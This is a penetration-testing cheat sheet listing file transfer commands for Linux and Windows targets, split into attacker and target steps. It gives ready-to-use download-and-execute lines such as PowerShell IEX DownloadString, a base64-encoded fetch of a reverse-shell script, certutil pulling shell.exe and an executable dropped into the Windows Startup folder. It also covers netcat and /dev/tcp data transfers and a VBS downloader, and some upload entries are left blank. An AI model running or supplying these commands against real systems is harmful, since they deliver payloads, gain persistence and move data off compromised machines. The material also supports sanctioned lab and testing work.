# File Transfer Commands

## Linux

### wget

Download: `wget http://192.168.1.2/filename.txt`

Upload:

### curl

Download: `curl http://192.168.1.2/filename.txt -o filename.txt`

Upload:

### netcat

Target: `nc -nvlp 4444 > outputfile`

Home: `nc -nvv 192.168.1.2 4444 < inputfile`

### socat

Home: `socat TCP4-LISTEN:443,fork file:file.txt`

Target: `socat TCP4:192.168.1.2:443 file:file.txt,create`

### scp

`scp /source/path/file.zip username@192.168.1.2:/destination/path/file.zip`

### PHP

`echo "<?php file_put_contents('filename', fopen('http://192.168.1.2/filename', 'r')); ?>" > filename.php`

### Base64

Encode: `base64 -w0 <file>`

Decode: `base64 -d <file>`

### SMB Impacket

Home: `impacket-smbserver.py -smb2support secure .` ==> Share current dir

Target: `smbclient -N \\\\<home-ip>\\<share>`

### /dev/tcp

Download: `cat /path/file > /dev/tcp/<target ip>/<port>`

Upload:

    exec 6< /dev/tcp/10.10.10.10/4444

    cat <&6 > file.txt

## Windows

### tftp (for Win XP and 2003)

Home: `atftpd --daemon --port 69 /tftp`

Target download: `tftp -i <home ip> PUT file.txt`

Target upload: `tftp -i <home ip> GET file.txt`

### FTP

Create a file containing these commands on attacker machine:

```bash
echo open 192.168.1.2 21> file.txt
echo USER username>> file.txt
echo password>> file.txt
echo bin >> file.txt
echo GET nc.exe >> file.txt
echo bye >> file.txt
```

On target machine: `ftp -v -n -s:file.txt`

### VBS (Win XP, 2003)

On attacker machine:

```bash
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
```

Before sending over to Windows target: `unix2dos wget.vbs`

On target machine: `cscript wget.vbs http://192.168.1.2/xyz.txt xyz.txt`

### Powershell

#### Interactive Session

Download to disk (any version):

```powershell
(New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2/exploit.exe', 'exploit.exe')
```

Download to disk (version 4+):

```powershell
IWR "http://10.10.16.7/Incnspc64.exe" -OutFile "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Incnspc64.exe"
```

Download and reflectively execute:

```powershell
IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.1.2/test.ps1')
```

Encode Command:

```powershell
$command = 'IEX (New-Object Net.WebClient).DownloadString("http://172.16.100.55/Invoke-PowerShellTcpRun.ps1")'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
```

Then, `Powershell -EncodedCommand $encodedCommand`

#### Non-interactive session

```powershell
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://192.168.1.2/exploit.exe" >>wget.ps1
echo $file = "exploit1-ouput.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
```

Then, run `powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1`

### wget

    wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"

### Certutil

    certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe

### SMB

Assuming you have an SMB server running on your home machine.

On target: `copy \<home ip>\sharename\file.exe .`
